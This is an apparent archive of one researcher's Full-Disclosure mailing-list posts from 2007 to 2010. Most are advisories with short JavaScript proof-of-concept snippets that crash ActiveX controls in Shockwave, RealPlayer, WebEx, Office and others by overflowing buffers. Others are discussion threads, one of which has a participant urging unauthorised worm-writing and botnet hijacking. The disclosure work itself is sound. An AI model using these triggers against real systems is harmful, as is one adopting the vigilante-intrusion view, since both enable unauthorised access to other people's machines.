>> 
>>
>> From: full-disclosure-boun...@lists.grok.org.uk
>> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of
>James
>> Matthews
>> Sent: Friday, March 13, 2009 8:10 AM
>> To: Ivan .
>> Cc: full-disclosure
>> Subject: Re: [Full-disclosure] BBC cybercrime probe backfires
>>
>>
>>
>> I agree! Why can't another people hack into computers to
>show This is
>> such BS and the BBC should be hit hard by what they did.
>>
>> On Fri, Mar 13, 2009 at 7:18 AM, Ivan . 
>wrote:
>>> The BBC hacked into 22,000 computers as part of an
>investigation into
>>> cybercrime but the move quickly backfired, with legal experts
>claiming
>>> the broadcaster broke the law and security gurus saying the
>experiment
>>> went too far.
>>>
>>>
>>> http://www.smh.com.au/news/technology/security/bbc-cybercrime-
>probe-backfires/2009/03/13/1236447465056.html
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>>
>> --
>> http://www.astorandblack.com/
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAkm6x64ACgkQi04xwClgpZhBnQP9Gyf79ajWHLQWT/qwpcTlXRRo2Aev
RPy7fqKDezxbdW6Wj4+NF01jJKnN1hxvzO6y7UJu8nZb/8MjFjQpptX8cDEOXkSS/eL2
6BQk6awvUVE3bDaGnSGtKxzRoB/9QacSWIY2aesUei3SO+nLvDY6yDSTgluY297qecO2
5IDsLvU=
=uFrf
-END PGP SIGNATURE-

--
Easy-to-use, advanced features, flexible phone systems.  Click here for more 
info.
 
http://tagline.hushmail.com/fc/BLSrjkqmC5s2cecqKfSSclHfpTNNeiKm5PudF1bmQuvHeBlZWDiL7es1xba/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] BBC cybercrime probe backfires

2009-03-14 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

No, and besides, we all have a /dev/null for whatever we don't want
to listen to...

On Fri, 13 Mar 2009 17:04:48 -0400 T Biehn  wrote:
>Here's one to mull over.
>Is changing someone's mind with relentless logic tantamount to
>'breaking and entering' into their mind?
>
>-Travis
>
>On Fri, Mar 13, 2009 at 4:53 PM, Elazar Broad
> wrote:
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> I am inclined to agree, except that you still have issues with
>the
>> electronic equivalent of breaking and entering. Case in point,
>> there is a good chance you would be arrested and prosecuted if
>you
>> opened the door to another persons dwelling which did not have a
>> lock installed, and installed a lock and left him/her the key,
>> simply because you entered their property without permission.
>From
>> a ethics perspective, most people would judge you a good
>Samaritan,
>> you helped someone else protect their property, however the law
>> doesn't see it that way, primarily because of the fact that, if
>you
>> don't have permission to be there, chances are you are not
>wanted
>> there, no matter what your intentions may be.
>>
>> As far as hijacking bot nets, one who steals from a thief may be
>a
>> thief, but one who stops one in the act is a hero. Bot nets are
>> always "in the act"...
>>
>> On Fri, 13 Mar 2009 14:00:47 -0400 T Biehn 
>wrote:
>>>More people should hijack machines and push updates to them if
>>>their
>>>users are unable or unwilling.
>>>
>>>First an Analogy:
>>>If someone's letting money launders use their bank account to
>>>launder
>>>money out of INACTION that's still illegal, the same SHOULD be
>>>true of
>>>people who leave their systems unpatched.
>>>
>>>These machines are negligently left open to be used in
>'nefarious
>>>criminal activity.'
>>>
>>>Plan of Action:
>>>It's your civic duty to write worms, hijack botnets and patch
>>>machines
>>>with or without user consent.
>>>This is absolutely moral holding to the various tests (is it
>self
>>>defeating if -everyone- does it etc etc)
>>>Just don't get caught doing it.
>>>
>>>I'm disgusted by the imposition that you'd decry their actions
>for
>>>being illegal when they were clearly moral and represent a net
>>>benefit
>>>for society. Haven't you heard of this guy called Gandhi who
>>>didn't
>>>subscribe to the arbitrary superficial morality provided by the
>>>word
>>>of the law and only acted on what he knew to be moral?
>>>
>>>It's time to elevate yourself out of your own mind-slime and
>into
>>>2009.
>>>We all still have a long way to go.
>>>
>>>-Travis
>>>
>>>On Fri, Mar 13, 2009 at 9:00 AM, Castigliola, Angelo
>>> wrote:
>>>> Very unorthodox and unethical.
>>>>
>>>>
>>>>
>>>> Angelo Castigliola III
>>>> EISRM - Application Security Architecture
>>>>
>>>> Unum
>>>>
>>>> acastigli...@unum.com
>>>>
>>>>
>>>>
>>>> Disclaimer: The opinions expressed are my own personal
>opinions
>>>and do not
>>>> represent my employer's view in any way.
>>>>
>>>> 
>>>>
>>>> From: full-disclosure-boun...@lists.grok.org.uk
>>>> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf
>Of
>>>James
>>>> Matthews
>>>> Sent: Friday, March 13, 2009 8:10 AM
>>>> To: Ivan .
>>>> Cc: full-disclosure
>>>> Subject: Re: [Full-disclosure] BBC cybercrime probe backfires
>>>>
>>>>
>>>>
>>>> I agree! Why can't another people hack into computers to
>>>show This is
>>>> such BS and the BBC should be hit hard by what they did.
>>>>
>>>> On Fri, Mar 13, 2009 at 7:18 AM, Ivan . 
>>>wrote:
>>>>> The BBC hacked into 22,000 computers as part of an
>>>investigation into
>>>>> cybercrime but the move quickly backfired, with legal experts
>>>claiming
>>>>> the broadcaster broke the law and security gurus saying the
>>>experiment
>>>>> went too far.
>>>>&

[Full-disclosure] Autodesk IDrop ActiveX Control Heap Corruption Vulnerability

2009-04-02 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Who:
Autodesk
http://www.autodesk.com

What:
Autodesk IDrop ActiveX Control
http://usa.autodesk.com/adsk/servlet/index?siteID=123112&id=2753219&;
linkID=9240618

IDrop.ocx
version 17.1.51.160
{21E0CB95-1198-4945-A3D2-4BF804295F78}

How:
The Src, Background, PackageXml properties can be manipulated to
trigger a heap use after free condition resulting in arbitrary
remote code execution. Other properties may be vulnerable as well.

Fix:
Remove or set the killbit for the affected control, see
http://support.microsoft.com/kb/240797.

Currently, there will be NO official patch for this issue.
Autodesk's statement is as follows:

"Thank you for taking the time and effort to identify a potential
issue with our technology. We do take each and every customer or
developer issue seriously and have spent time in reviewing your
analysis of our i-drop technology. At this time, we have ceased
investment in i-drop technology. It was released over five years
ago as a means for developers to leverage their content delivery;
we’ve made no new investment in this tool and have no current plans
to update it in the near future. We’ve recorded your issue in our
tracking database and will determine its priority if/when we
determine new investment is required for this technology.

Thank You – Autodesk"

Timeline:
06/17/2008 - Vendor notified
03/31/2009 - Vendor final response
04/02/2009 - this advisory

Credit:
Elazar Broad
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAknVCzkACgkQi04xwClgpZjlOAP/XPrEIbz0bxFCYPQRo+NoK+3DlfIP
/PmdSufN+ySHp1XrFmYwRbYaer09DHMqzos39h5g824qOiWAlSLWsWa8CXGz0MMoDnnl
f0mly7WKylghfbu7OeK2/K3FI867671NvVWtDVaGOWlGQtZyfbC93FH5lA8CxztHcTBW
9YlNtYQ=
=ocum
-END PGP SIGNATURE-

--
Top brands, low prices. Find the right air conditioner for you. Click Now!

http://tagline.hushmail.com/fc/BLSrjkqbxEvskkkukT49abObPrv0Gw8WsgGlW2x7zjH8Gt6QNn5ocunjeco/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Stealthier Internet access

2010-05-25 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


Thermite will definitely do, checkout
http://hackaday.com/2008/09/16/how-to-thermite-based-hard-drive-
anti-forensic-destruction/ and of course a .50 APIT round will do
as well:
http://www.ranum.com/security/computer_security/editorials/diskcrypt
/index.html.

elazar

On Tue, 25 May 2010 16:08:45 -0400 valdis.kletni...@vt.edu wrote:
>On Wed, 26 May 2010 01:25:25 +0545, Bipin Gautam said:
>
>Rest of article actually looks good at first glance, but this
>jumped out at me:
>
>> > -Software disk Wiping:
>> >  Wipe KEY, header of your encrypted storage volume (first few
>mb, ref
>> > specific manual) Ref using Peter Gutmann standard of data
>wipeing (35
>> > wipes)
>> > And wipe entire storage using U.S. DoD 5200.28-STD (7 wipes)
>
>There is zero evidence that anybody is able to recover data after
>even a
>single overwrite of /dev/zero on a disk drive made this century.
>Even in
>the MFM days, Gutmann's recovery technique was difficult - today's
>densities
>render it essentially impossible.  Even if it's possible, if your
>threat model
>includes the sort of organizations that could theoretically do it,
>maybe you
>should be considering thermite rather than software wipes.
>Especially if
>they're pounding on your door. ;)
>
>I'm more than open to hear of any *confirmed* cases of data
>recovered after
>even a single overwrite anytime after 1995.  To date, I have not
>seen one.
>Prove me wrong, guys. ;)
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkv8qM0ACgkQi04xwClgpZhNWgP+Jg91G1IJm5+L64QZSiKfQA7pllvt
SU9eYGPfbSB3hav5FWio4R0OSl1ivSox5X3FSgQRxYup6+BqZD3PtmeD38CykutOPAdy
/5CG8L+RpoetFKXx4guT3hAGQO/arMfnbgD9wKY6cPxX7hXEtViciU8pvyHgXLIVYyEE
0dmsm5c=
=pSkX
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] SAPGui BI wadmxhtml.dll Tags Property Heap Corruption

2010-07-15 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Who
- 
SAP
http://www.sap.com

What
- 
SAPGui BI component

File:  %PROGRAMFILES%\sap\business explorer\bi\wadmxhtml.dll
Version: 7100.1.400.8
ClassID: 30DD068D-5AD9-434C-AAAC-46ABE37194EB
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data
IPersist Safe:  Safe for untrusted: caller,data
KillBitSet: False

How
- 
Vulnerable Property: Tags

The Tags property can be manipulated to trigger heap corruption
resulting in the execution of arbitrary code.


Fix
- 

SAP set the kill-bit for this control with Patch 17 for SAPGui.
Alternatively, you can set the kill-bit manually, please see
http://support.microsoft.com/kb/240797.

Credit
- 
Elazar Broad
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAkw/NAsACgkQi04xwClgpZiFhQP/RfjeHhaBzFZDcwpvkq8eAsE1QclV
8pqzmhDv5xXh8s+hbKYyLqLq8St/3z6reBKoHP0//BVbOSE/1CTRCyiJuKjV0SLP3qdb
vkCzrtg5eoGCKUvEWoqjE6NNysmV/P0j88T/NRBv3jkznINWAl6mf+n/JwKC4KC57wKQ
9n3IjvY=
=yNee
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Day of bugs in WordPress 2

2010-07-29 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

ed or nano? :)

On Thu, 29 Jul 2010 20:47:19 -0400 valdis.kletni...@vt.edu wrote:
>On Thu, 29 Jul 2010 17:18:28 PDT, Zach C said:
>> So if Drupal and WordPress, etc. are so terrible, what would you
>all recommend?
>
>vi or emacs. Take your pick, I'm not starting an editor war. ;)
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkxSUVcACgkQi04xwClgpZgH2AP+MIN2ShokOCNPpUhwX1OH4SxzatZk
xbuu0eRzzmjGFarJ+O6xv/aRzSlbzHok3mIckL9qKPYk9mAE7G3uoe0ASbo2HtVnVHrY
BsxxPAIYrYjK4em7J89MvsTETTO68UsV687QmDLkeC8B8A8dCAeYPhHPyt+tb7t3AMqT
3WQOlEU=
=z8+c
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Expired certificate

2010-08-02 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


Can't you? The world is full of unpatched systems. You can even find
systems where patches are not installed because it is running a
piece of
mission critical software and they would lose support if they
installed
any patches (I am not making this up).


Spot on. I know of one large accounting/ERP system(which shall
remain nameless, though I am sure there are those out there who
have come across it) that checked the SQL version, including the
revision number at runtime, which made patching SQL impossible.

On Sun, 01 Aug 2010 15:38:46 -0400 Pavel Kankovsky
 wrote:
>On Sun, 25 Jul 2010, Dan Kaminsky wrote:
>
>> > So... no one is doing revocation checking and expiration is
>evil.
>> > How are we supposed to get rid of invalid certificates?
>>
>> Ask me that in a few days ;)
>
>Has one week been enough for you? :)
>
>> So nobody will sell you a name constrained certificate.  It's
>almost
>> like there are serious implementation issues with the extension
>in the
>> field.
>
>Obviously not serious enough to prevent their use by US Federal
>Bridge CA.
>See
>
>
>> Absolutely correct.  Whatever world X.509 is great for, it sure
>ain't
>> this one.
>
>Governments and big companies *are* hierarchical and bureacratic
>and X.509
>was developed for them.
>
>> Patch management involves the same thing being put on different
>hosts,
>> and there's really no choice -- you can't run an infrastructure
>without
>> maintaining it, on some timescale anyway.
>
>Can't you? The world is full of unpatched systems. You can even
>find
>systems where patches are not installed because it is running a
>piece of
>mission critical software and they would lose support if they
>installed
>any patches (I am not making this up).
>
>> Certificate management involves different things being put on
>different
>> hosts, [...]
>
>This is a red herring. When you have got a bag of certificates, it
>is
>trivial to pick the right certificate for every host and check it
>automatically both before and after deployment. And everything
>else but
>the bits (place where the cert is installed, services that need to
>be
>restarted etc.) can stay identical.
>
>> [...] and there's totally a choice -- you can simply not have a
>> certificate at all.
>
>Yes. And you can teach your users to check all server public keys
>manually. You can also make a choice to send everything in
>cleartext and
>set all passwords to "123456" because it will make your life much
>easier.
>
>> To paraphrase another quote, "X.509 never fails, only X.509
>deployers."
>
>I do not say X.509 never fails, I question
>
>> You know, it's strange.  I never hear stories about networks
>being taken
>> down for nonpayment of electric bills, but we have straight up
>UI
>> support for certificate errors.  Why do you think that is?
>
>There are various cases of epic fails related to electric bills
>but I
>admit I have not found a clear example affecting IT infrastructure
>
>directly.
>
>Replace interrupted power supply with expired domain registration
>and
>you'll be able to find dozens of incidents, all of them affecting
>IT for
>obvious reasons--and some of them involving big names like
>Microsoft and
>Google.
>
>--
>Pavel Kankovsky aka Peak  / Jeremiah 9:21
>  \
>"For death is come up into our MS Windows(tm)..." \ 21st century
>edition /
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkxW9BUACgkQi04xwClgpZiFcAP+OdK2LXgk4IWqZYOMSBRGnMw7yM8N
j70MmuihfrvK6q2wyhPtizhnldqX3sWCKhhyHgZbkEUhEtiiOkycKf4x42CO/+dqxzAU
xufzLA6paJrf4ugyCPd7xZteEpgKmSFOQVtt8IZV3ttdEbQ4kRpVmdpa5dtWRRBq0b9q
DeB2GwI=
=5IDt
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] why not a sandbox

2009-09-06 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

http://www.sandboxie.com/

On Fri, 04 Sep 2009 14:05:24 -0400 RandallM 
wrote:
>how come we just can't sandbox the browser in away from the
>system.
>its the users that just get gmail and click links, watch youtube
>vids
>and check FaceBook and Mypace that infect the network!
>
>--
>been great, thanks
>a.k.a System
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkqkSY0ACgkQi04xwClgpZhUagP+M5dOmEce1r4B/+yj0n6pA73T6gaK
pGgL74XuFLJFFF1WoHFZG3mkePR/DZGyz+8dl7B/TSxpblXtC4df9FSU5ri1NyU/pPiZ
O7XvZPD0jL1zmGtysZc5NKa6/PAGwFSF0SsLPWStxCoVEg1QkOZWUCWkaSRczedGwyiK
4BEdaPo=
=7VkF
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] What's with www.modsecurity.org

2009-09-06 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Works fine for me...

On Sun, 06 Sep 2009 14:23:37 -0400 David Alanis 
wrote:
>Good Day,
>
>Anyone happen to know what is going on with www.modsecurity.org or
>
>www.breach.com?
>
>Cheers,
>David
>
>
>This message was sent using IMP, the Internet Messaging Program.
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpsEAQECAAYFAkqkSjkACgkQi04xwClgpZh0gQP4yQRl6dW29vq6BMHZ3BZgykX2CWuA
c/dadvg4Px+YPs4DGbf3Aut7H7LrhrC1GKp1qvXO2npQjMmm+GxVX9QnAqao6HO2/TC0
UXad2OTdYgeMOsPC8iNyiYb0kA7YD+pmiBghXsDeyj8wJOrMNYEI2zWYAidNN3xPfPEb
XJNdlQ==
=xqoS
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] When is it valid to claim that a vulnerability leads to a remote attack?

2009-10-09 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1



On Fri, 09 Oct 2009 10:24:02 -0400 Paul Schmehl
 wrote:
>--On Thursday, October 08, 2009 22:16:01 -0500 Jonathan Leffler
> wrote:
>
>>
>> A reputable security defect reporting organization is claiming
>that a Windows
>> program is subject to a remote attack because:
>>
>> * The vulnerable program (call it 'pqrminder') is registered as
>the 'handler'
>> for files with a specific extension (call it '.pqr').
>> * If the user downloads a '.pqr' file (or is sent on in the mail
>and clicks
>> on it), then 'pqrminder' is invoked.
>> * If the file is malformed, then arbitrary code can be executed
>(buffer
>> overflow).
>>
>> While recognizing that there is a bug here, that does not strike
>me as being
>> what is normally meant by a 'remote attack'.
>
>In fact it's very typical of the types of attacks we see every day
>now.  By far
>the most routinely successful attacks now are initiated through
>some sort of
>social engineering trick that requires user interaction to trigger
>the
>compromise.
>
>If by remote you mean "live interaction by the hacker at the point
>of attack"
>(as in a "traditional" hack), then no, it's not a remote attack.
>I think the
>more normal undertstanding of remote attack (although it's usually
>worded
>remote compromise) is that the result of a successful attack is
>the opening of
>a gateway that can lead to additional compromise or complete
>takeover of a
>machine.  Given the details you've offered,  think this qualifies
>as
>"potentially leading to a remote compromise" of a machine.
>
>The attack begins when the unsuspecting user clicks on a link to
>either open an
>attachment or view a webpage or video.  In the background the
>compromise takes
>place, after which the malicious software "phones home", downloads
>additional
>tools, etc. until the host is completely and utterly compromised.
>
>--
>Paul Schmehl, Senior Infosec Analyst
>As if it wasn't already obvious, my opinions
>are my own and not those of my employer.
>***
>"It is as useless to argue with those who have
>renounced the use of reason as to administer
>medication to the dead." Thomas Jefferson
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/

Think Adobe Acrobat, most of the issues had to do with file
parsing(JBIG2 comes to mind), and the drive by campaigns exploiting
the issue(s) were probably quite successful...

elazar
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkrPdoYACgkQi04xwClgpZjcogP7B3C79Hr+0RJe9z0Ds9qO8ReKJIkB
OLfm5QuifgEuz7Z/4mX2k0ZMqGkqJT3rBE2sR82vrTR2vNK0pMnoNxIy/V71MXBmdZqE
PpXssC5LBRgWD29jFWeBIC0ORTrBZJ1+lcg3dmx9mYlr3moKk9yE3+GXg5Jds2vZvgDy
OUqnnyk=
=LCG2
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Adobe Shockwave ShockwaveVersion() Stack Overflow

2007-11-08 Thread Elazar Broad

There is a stack overflow in ShockwaveVersion() function. I have not been able 
to execute code via this overflow. PoC is as follows:
---

 
  
function Check() {
 var s = "";
 while (s.length < 768 * 768) s=s+s;
  
 var obj = new ActiveXObject("SWCtl.SWCtl"); 
//{233C1507-6A77-46A4-9443-F871F945D258} 

 obj.ShockwaveVersion(s);
}
  

   
 

---

Elazar

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Office Web Controls DataSourceControl Memory Access Violation

2007-11-12 Thread Elazar Broad

There is an un-handled memory access violation in the OWC11.DataSourceControl. 
As far as I know, I don't think it is possible to execute code via this, the 
worst it can do is crash Internet Explorer. PoC as follows:

--


 
  
function Check() {
  var obj = new ActiveXObject("OWC11.DataSourceControl"); 
 
  obj.XMLDataTarget = "A";

 }
  

   
 

--

Elazar

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Microsoft Remote Help safrcdlg.dll Buffer Overflow

2007-11-12 Thread Elazar Broad

The GetProfileString function of the SAFRCFileDlg.RASetting control contains a 
buffer overflow. This control is NOT marked safe for scripting, and seems to 
execute in the context of the user, so I am not sure what can be done 
maliciously with this. Never the less, it is a buffer overflow. PoC as follows:

--
//written by e.b.
var s = "";
while (s.length < 999 * 999) s=s+s;

var obj = new ActiveXObject("SAFRCFileDlg.RASetting");

obj.GetProfileString(s);
--

Elazar


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Microsoft Forms 2.0 Controls Multiple Memory Access Violations

2007-11-12 Thread Elazar Broad

There are multiple memory access violations in the Microsoft Forms 2.0 
Controls(FM20.dll). PoC as follows:





 
  
function Check() {
  var obj;

  //Forms.Checkbox.1
  obj = new ActiveXObject("Forms.Checkbox.1");  
  obj.Caption = "A";
  obj.GroupName = "A";
  obj.Accelerator = "A";

  //Forms.OptionButton.1
  obj = new ActiveXObject("Forms.OptionButton.1");  
  obj.Caption = "A";
  obj.GroupName = "A";
  obj.Accelerator = "A";

  //Forms.ToggleButton.1
  obj = new ActiveXObject("Forms.ToggleButton.1");  
  obj.Caption = "A";
  obj.GroupName = "A";
  obj.Accelerator = "A";

 //Forms.ComboBox.1
 obj = new ActiveXObject("Forms.ComboBox.1"); 
 obj.Text = "A";
 obj.Value = "A";


 //Forms.TextBox.1
 obj = new ActiveXObject("Forms.Textbox.1"); 
 obj.Text = "A";
 obj.Value = "A";
 obj.SelStart = 1;
}
  

   
 



There may be more.

Elazar

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] WebEx GPCContainer Memory Access Violation

2007-11-13 Thread Elazar Broad

There is a memory access violation in the InitParam() and SetParam() functions. 
PoC as follows:

-


 
  
function Check() {
var obj = new ActiveXObject("GpcContainer.GpcContainer.1"); 

obj.InitOaram("A");
}
  

   
 
  
 


-

Elazar

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] WebEx GPCContainer Memory Access Violation

2007-11-14 Thread Elazar Broad

Typo in the original PoC. It should read as follows:

-


 
  
function Check() {
var obj = new ActiveXObject("GpcContainer.GpcContainer.1");

obj.InitParam("A");
}
  

 
 
  
 


- 

Elazar

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ComponentOne FlexGrid 7.1 Light Multiple Stack Overflows

2007-11-15 Thread Elazar Broad

The ComponentOne FlexGrid 7.1 (VSFlexGrid.VSFlexGridL) has multiple stack 
overflows. I have not tested code execution nor do I remember what this 
component was installed with. PoC as follows:




 
  
function Check() {
 var s = "";

 while (s.length < 262145) s=s+s;
  
 var obj = new ActiveXObject("VSFlexGrid.VSFlexGridL");
 
 obj.Text = s;
 obj.EditSelText = s; 
 obj.EditText = s;
 obj.CellFontName = s;
   }
  

   
 



Elazar

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Multiple stack-based buffer overflows in dxmsft.dll

2007-11-19 Thread Elazar Broad

There are multiple stack overflows in dxmsft.dll version 6.3.2900.3199(Image 
DirectX Transforms). This DLL exposes DirectX Image Transform objects which are 
safe for scripting. The issue is with the Color property of certain objects, so 
I am assuming this property is inherited from a base interface.
This affects WindowsXP SP2 IE6(fully patched), I have not tested this on
IE7 and it does not appear to affect Windows Server 2003 R2 SP2(newer version 
of the dxmsft.dll). I have not tested code execution, though it may be 
possible. I received the following response from Microsoft:

---
>From our investigation this issue was found to be a stability problem which is 
>not exploitable. The net effect of this issue is that IE will become 
>unresponsive. The underlying operating system will still respond and Killing 
>the process will stop the local DoS.
---

It did not hang IE on my machine, but instead crashed IE with a stack overflow. 
This may be related to http://www.securityfocus.com/bid/19029/.

PoC as follows:

-


 
  
function Check() {
 var s = "";

 while (s.length < 99) s=s+s;

var obj = new ActiveXObject("DXImageTransform.Microsoft.Chroma");
 obj.color = s;

var obj = new ActiveXObject("DXImageTransform.Microsoft.DropShadow");
 obj.color = s;

var obj = new ActiveXObject("DXImageTransform.Microsoft.Glow");
 obj.color = s;
 
var obj = new ActiveXObject("DXImageTransform.Microsoft.MaskFilter");
 obj.color = s;

var obj = new ActiveXObject("DXImageTransform.Microsoft.Shadow");
 obj.color = s;

   }
  

 
 

-

Elazar

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Multiple stack-based buffer overflows in dxmsft.dll

2007-11-19 Thread Elazar Broad

I did not see this: http://www.milw0rm.com/exploits/4251, my apologies, please 
ignore my last post...

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Aurigma ImageUploader 4.1 Multiple stack overflows

2007-11-22 Thread Elazar Broad

There are multiple stack overflows in the Aurigma ImageUploader 4.1 ActiveX 
control. I believe this control was installed by www.dotphoto.com. PoC as 
follows:

---


 
  
function Check() {
var s = "";

 while (s.length < 99) s=s+s;

 var obj = new ActiveXObject("Aurigma.ImageUploader.4.1"); 
//{6E5E167B-1566-4316-B27F-0DDAB3484CF7}
  obj.GotoFolder(s);
  obj.CanGotoFolder(s);

   }
  

 
 
 
 

---


Elazar

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Aurigma ImageUploader 4.1 Multiple stack overflows

2007-11-25 Thread Elazar Broad

I have been in contact with Aurigma and they have fixed the issue. They plan on 
releasing an update on Monday. I would like to thank Andrew S. and the Aurigma 
development team for a fast response and a quick turnaround.

Elazar 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows

2007-11-26 Thread Elazar Broad

There are multiple stack overflows in the ierpplug.dll ActiveX Control. These 
issues were originally discovered by shinnai, 
http://www.securityfocus.com/bid/22811 and 
http://www.securityfocus.com/bid/21802. I am adding the Import() and 
PlayerProperty() functions to the list. This was tested on Windows XP SP2 fully 
patched, using IE 6; RealPlayer version 11, build 6.0.14.738, dist R41R01, 
ierpplug.dll version 1.0.1.3016. I have not tested code execution. PoC as 
follows:




 
  
function Check() {
var s = "";

while (s.length < 99) s=s+s;

 var obj = new ActiveXObject("IERPCTL.IERPCTL"); 
//{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}


  obj.Import(s);
  var obj2 = obj.PlayerProperty(s);
  

   }
  

 
 

 
 


Elazar

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

